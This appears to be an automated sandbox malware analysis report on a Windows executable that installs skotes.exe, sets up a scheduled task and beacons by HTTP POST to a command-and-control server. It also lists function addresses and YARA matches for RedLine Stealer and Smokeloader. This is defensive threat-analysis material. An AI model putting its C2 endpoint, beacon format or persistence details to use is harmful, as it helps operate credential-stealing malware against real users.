Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_0040AA09 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,

0_2_0040AA09

Source: unknown

HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(
Source: skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(Y
Source: skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php)X
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf02d1
Source: skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8X
Source: skotes.exe, 00000020.00000002.2708227505.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpC
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpL
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpT
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpi
Source: skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpmX
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpz
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000015.00000002.1705935436.00000000005AC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.2708185085.00000000007A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1686331848.000000000079F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.2708366906.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0041CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	0_2_0041CB97
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0041CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	21_2_0041CB97
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0041CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	32_2_0041CB97

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00409A00	0_2_00409A00
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0040AA09	0_2_0040AA09
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00447049	0_2_00447049
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00426192	0_2_00426192
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_004431A8	0_2_004431A8
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00421602	0_2_00421602
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0044779B	0_2_0044779B
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00448860	0_2_00448860
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_004478BB	0_2_004478BB
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00404B30	0_2_00404B30
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00442D10	0_2_00442D10
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00404DE0	0_2_00404DE0
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00423DF1	0_2_00423DF1
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00420E13	0_2_00420E13
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00437F36	0_2_00437F36
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_023672B0	0_2_023672B0
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_023463F9	0_2_023463F9
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0234107A	0_2_0234107A
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02344058	0_2_02344058
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02325047	0_2_02325047
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0235819D	0_2_0235819D
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02367A02	0_2_02367A02
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02368AC7	0_2_02368AC7
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02367B22	0_2_02367B22
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02341869	0_2_02341869
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02362F77	0_2_02362F77
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02324D97	0_2_02324D97
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00409A00	21_2_00409A00
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00447049	21_2_00447049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00426192	21_2_00426192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_004431A8	21_2_004431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00421602	21_2_00421602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0044779B	21_2_0044779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00448860	21_2_00448860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_004478BB	21_2_004478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00404B30	21_2_00404B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00442D10	21_2_00442D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00404DE0	21_2_00404DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00423DF1	21_2_00423DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00420E13	21_2_00420E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00437F36	21_2_00437F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020E72B0	21_2_020E72B0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020C63F9	21_2_020C63F9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020A5047	21_2_020A5047
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020C4058	21_2_020C4058
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020C107A	21_2_020C107A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020D819D	21_2_020D819D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020E7A02	21_2_020E7A02
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020E8AC7	21_2_020E8AC7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020E7B22	21_2_020E7B22
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020C1869	21_2_020C1869
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020E2F77	21_2_020E2F77
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020A4D97	21_2_020A4D97
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00426192	32_2_00426192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0040E530	32_2_0040E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00448860	32_2_00448860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00404B30	32_2_00404B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00442D10	32_2_00442D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00404DE0	32_2_00404DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00420E13	32_2_00420E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00447049	32_2_00447049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_004431A8	32_2_004431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00421602	32_2_00421602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0044779B	32_2_0044779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_004478BB	32_2_004478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00423DF1	32_2_00423DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00437F36	32_2_00437F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021D72B0	32_2_021D72B0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021B63F9	32_2_021B63F9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021B4058	32_2_021B4058
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_02195047	32_2_02195047
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021B107A	32_2_021B107A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021C819D	32_2_021C819D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021D7A02	32_2_021D7A02
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021D8AC7	32_2_021D8AC7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021D7B22	32_2_021D7B22
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021B1869	32_2_021B1869
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021D2F77	32_2_021D2F77
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_02194D97	32_2_02194D97

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041DF80 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 021AE1E7 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041D663 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 020BDBA9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041D64E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00417A00 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 020B8327 appears 135 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 021AD8B5 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041D942 appears 167 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 021ADBA9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 021A8327 appears 135 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 020BE1E7 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041C0E9 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 004180C0 appears 262 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00438E10 appears 43 times
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: String function: 0041DF80 appears 43 times
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: String function: 0233E1E7 appears 38 times
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: String function: 02338327 appears 135 times
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: String function: 0233DBA9 appears 68 times
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: String function: 0041D942 appears 79 times
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: String function: 004180C0 appears 131 times

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 724

Source: p3aYwXKO5T.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000015.00000002.1705935436.00000000005AC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.2708185085.00000000007A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1686331848.000000000079F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.2708366906.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
